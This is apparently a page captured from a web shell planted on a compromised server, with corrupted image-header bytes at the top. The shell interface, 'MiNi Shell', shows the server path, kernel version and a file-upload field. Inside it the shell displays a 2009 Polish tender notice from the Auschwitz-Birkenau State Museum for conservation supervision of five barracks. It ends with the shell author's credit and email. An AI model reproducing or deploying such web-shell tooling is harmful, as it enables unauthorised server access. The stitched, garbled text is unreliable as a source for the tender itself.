JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090730/260892-N-2009.html

<p class="kh_header"><b>Oświęcim: usługa nadzoru konserwatorskiego przy realizacji zadania: Konserwacja pięciu drewnianych baraków dawnego KL Auschwitz II-Birkenau</b><br>
<b>Numer ogłoszenia: 260892 - 2009; data zamieszczenia: 30.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu , ul. Więźniów Oświęcimia 20, 32-603 Oświęcim, woj. małopolskie, tel. 033 8432022, faks 033 8431934.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.auschwitz.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa nadzoru konserwatorskiego przy realizacji zadania: Konserwacja pięciu drewnianych baraków dawnego KL Auschwitz II-Birkenau.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
Pełnienie nadzoru konserwatorskiego  ze strony zamawiającego  nad przeprowadzanymi robotami budowlanymi i pracami konserwatorskimi w/w baraków, 

1.1. Zakres robót przewidzianych do nadzorowania:
	Roboty budowlane i prace konserwatorskie  w baraku o nr. inw. B-80, zlokalizowanym na terenie dawnego obozu Auschwitz II-Birkenau oraz wykonanie dokumentacji fotogrametrycznej ścian wewnętrznych baraku, 
	Roboty budowlane i prace konserwatorskie  w baraku o nr. inw. B-155, zlokalizowanym na terenie dawnego obozu Auschwitz II-Birkenau;
	Roboty budowlane i prace konserwatorskie  w baraku o nr. inw. B-166, zlokalizowanym na terenie dawnego obozu Auschwitz II-Birkenau;
	Roboty budowlane i prace konserwatorskie  w baraku o nr. inw. B-171, zlokalizowanym na terenie dawnego obozu Auschwitz II-Birkenau;
	Roboty budowlane i prace konserwatorskie  w baraku o nr. inw. B-210, zlokalizowanym na terenie dawnego obozu Auschwitz II-Birkenau;
Baraki, których dotyczy nadzór, to obiekty dawnego obozu Auschwitz II-Birkenau. Baraki o nr inw. B-155, B-166, B-171, B-210 to budynki o konstrukcji drewnianej, szkieletowej, w całości rozbieralne, których obudowa została wykonana 
z prefabrykowanych płyt .Wnętrze ma układ trójtraktowy (bazylikowy), prowadzą do niego dwie pary wrót umieszczonych w ścianach szczytowych budynku. Baraki te nie posiadają okien, a wnętrze doświetlają naświetla usytuowane w górnej części ścian środkowego traktu. Baraki te w zależności od przeznaczenia posiadają różne wyposażenie wnętrza. W barakach mieszkalnych (B-155, B-166, B-210) zachowały się głównie posadzki oraz ceglane elementy dawnego systemu ogrzewania - piece i przewody kominowe. W baraku o nr inw. 210 zachowana jest  niezwykle ciekawa dekoracja malarska komina.  W baraku o nr inw . B-171 (dawniej barak sanitarny)  zachowały się betonowe i ceglane posadzi ,metalowe  elementy instalacji wodnej.
Barak o nr inw. B-80 to również budynek  o konstrukcji drewnianej, którego ściany 
i dach wykonane zostały z płyt prefabrykowanych. Barak ten posiada odmienny typ konstrukcji w porównaniu do obiektów wcześniej wymienionych. W okresie funkcjonowania KL AuschwitzII-Birkenau barak ten pełnił funkcje szpitalną.  
We wnętrzu tego obiektu na ścianach zachowała się bogata dekoracja malarska..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 92.31.22.00-3, 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium w wysokości: 5600 ,- PLN 00/100 (słownie: pięćtysięcysześćsetzłotych PLN 00/100)- 
2.	Wadium należy wnieść przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy: 
1.1.	posiadają uprawnienia do wykonywania działalności lub czynności obejmujących swoim zakresem realizację przedmiotu zamówienia jeżeli ustawy wymagają posiadania takich uprawnień,  
1.2.	 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia), wyrażające się:
1.2.1.	wykonaniem w okresie ostatnich 3 lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 3 usług nadzoru konserwatorskiego  nad wykonaniem prac konserwatorskich lub kierowania pracami konserwatorskimi w obiektach zabytkowych w tym:
	co najmniej jedna usługa nadzoru lub kierowania pracami z zakresu konserwacji nawarstwień malarskich na podłożu drewnianym o konserwowanej powierzchni nie mniejszej niż 150m2 w budynku wpisanym do rejestru zabytków, 
	co najmniej jedna usługa nadzoru lub kierowania pracami związanymi ze wzmocnieniem drewna żywicami sztucznymi 

1.2.2   wykonaniem w okresie ostatnich 3 lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum  jednej usługi nadzoru konserwatorskiego  nad wykonaniem prac konserwatorskich lub kierowania pracami konserwatorskimi w zakresie materiałów budowlanych: cegły i zapraw mineralnych  w  obiektach  wpisanych do rejestru zabytków. 

1.2.3. posiadaniem uprawnień do prowadzenia prac konserwatorskich, restauratorskich lub badań konserwatorskich, określone w § 7 ust. 1 Rozporządzenia Ministra Kultury z dnia 09.06.2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytkach wpisanych do rejestru zabytków ruchomych (Dz. U. 150 poz. 1579), tj. tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub wyższych studiów w specjalności w zakresie konserwacji zabytków oraz odbyta co  najmniej 12-miesięczna praktyka zawodowa 
w zakresie konserwacji i badania zabytków po ukończeniu tych studiów lub kwalifikacje uzyskane przed pojawieniem się tego  rozporządzenia, określone w jego § 13. 
1.2.4.  co najmniej 6-miesięcznym  doświadczeniem (uzyskane w przeciągu ostatnich trzech lat) w nadzorowaniu lub kierowaniu pracami z zakresu nawarstwień malarskich na podłożu drewnianym.

Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana na podstawie złożonych dokumentów i spełniania wymagań formalnych, o których mowa w niniejszej siwz wg. formuły spełnia bądź nie spełnia. Nie spełnienie któregokolwiek z warunków wskazanych w niniejszej siwz spowoduje wykluczenie wykonawcy z zastrzeżeniem art. 26 ust. 3 p.z.p..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na ofertę składają się: 
	wypełniony formularz ofertowy stanowiący załącznik nr 2 do niniejszej SIWZ ,
	oświadczenie o spełnianiu warunków udziału w postępowaniu  zgodne 
z wzorem stanowiącym załącznik nr 3 niniejszej SIWZ,
oraz następujące dokumenty potwierdzające spełnienie warunków udziału 
w postępowaniu:
a.	oryginał lub kserokopia, poświadczona przez wykonawcę (osobę upoważnioną do występowania w obrocie prawnym) za zgodność 
z oryginałem, aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
b.	oryginały lub kserokopie poświadczone przez wykonawcę (osobę upoważnioną do występowania w obrocie) za zgodność 
z oryginałem, aktualnego zaświadczenia naczelnika właściwego urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
c.	oryginały lub kserokopie poświadczone przez wykonawcę (osobę upoważnioną do występowania w obrocie) za zgodność z oryginałem, dokumentów potwierdzających, że osoby, o których mowa w pkt. d, które będą wykonywać zamówienie, posiadają wymagane obowiązującymi przepisami prawa uprawnienia;
d.	wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia wraz z dokumentami zawierającymi informację na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Dokumentami tymi są: 
	dyplomów ukończenia wyższych studiów;
	dokumentów potwierdzających odbycie po ukończeniu tych studiów co najmniej 12-miesięcznej praktyki zawodowej 
w zakresie konserwacji i badania zabytków - może to być również oświadczenie lub CV; 
pisemne zobowiązanie innych podmiotów do udostępnienia wyżej wymienionych osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt d, wykonawca wskazał osoby, którymi będzie dysponował;
e.	wykaz wykonanych w okresie ostatnich 3 lat usług nadzoru konserwatorskiego lub kierowania  pracami konserwatorskimi, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem przedmiotowi zamówienia, z podaniem wartości , zakresu, daty i miejsca wykonania oraz danych dotyczących prac konserwatorskich objętych nadzorem lub kierowaniem oraz załączeniem dokumentów, potwierdzających, że te prace zostały wykonane należycie  (dokumenty te muszą zawierać wszystkie informacje potwierdzające spełnienie warunków wskazanych w punkcie III./ 1.2.1i 1.2.2.);.
f.	oświadczenie wykonawcy, że posiada co najmniej 6-miesięczne doświadczenie przy nadzorowaniu lub kierowaniu pracami z zakresu nawarstwień malarskich na podłożu drewnianym. 
g.	polisa lub inny dokument ubezpieczenia potwierdzający 
(zgodnie z punktem III/1.3.), że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej lub działalności wykonywanej osobiście na sumę gwarancyjną równą co najmniej cenie ofertowej brutto.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.auschwitz.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu, 32-603 Oświęcim, ul. Więźniów Oświęcimia 20.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, w Oświęcimiu, ul. Więźniów Oświęcimia 20, budynek administracyjny, Dziennik podawczy (parter, pokój nr 6).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej i budżetu państwa.

Creat By MiNi SheLL
Email: jattceo@gmail.com